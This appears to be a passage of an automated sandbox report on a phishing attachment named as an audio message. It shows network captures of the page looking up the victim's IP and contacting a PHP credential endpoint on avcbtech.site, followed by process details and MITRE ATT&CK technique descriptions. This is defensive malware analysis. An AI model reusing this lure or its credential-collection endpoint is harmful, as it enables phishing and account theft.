2025-03-27 17:32:13 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:32:13 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=54ac734d51012236420c1ccb0ec1678b; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:32:13 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49817	172.67.74.152	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:32:13 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:32:13 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:32:13 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9270a039ec591a5c-EWR server-timing: cfL4;desc="?proto=TCP&rtt=90824&min_rtt=90647&rtt_var=19302&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=33720&cwnd=252&unsent_bytes=0&cid=55cdd9893550c84c&ts=234&x=0"
2025-03-27 17:32:13 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49818	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:32:13 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
2025-03-27 17:32:14 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:32:14 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:32:14 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49819	104.26.12.205	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:32:13 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:32:14 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:32:14 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9270a03c8c5d19bb-EWR server-timing: cfL4;desc="?proto=TCP&rtt=90659&min_rtt=89651&rtt_var=19906&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=34043&cwnd=252&unsent_bytes=0&cid=d0399f09f1ebfb20&ts=240&x=0"
2025-03-27 17:32:14 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	1
Start time:	13:28:56
Start date:	27/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	13:29:00
Start date:	27/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,1541385170387388932,2389478623955166807,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1944 /prefetch:3
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	13:29:05
Start date:	27/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#Ud83d#Udd0aAudio_Msg Pharma.xhtml"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #Ud83d#Udd0aAudio_Msg Pharma.xhtml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Static File Info

General

Static OLE Info

General

OLE File "#Ud83d#Udd0aAudio_Msg Pharma.xhtml"

Indicators

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

Windows Analysis Report
#Ud83d#Udd0aAudio_Msg Pharma.xhtml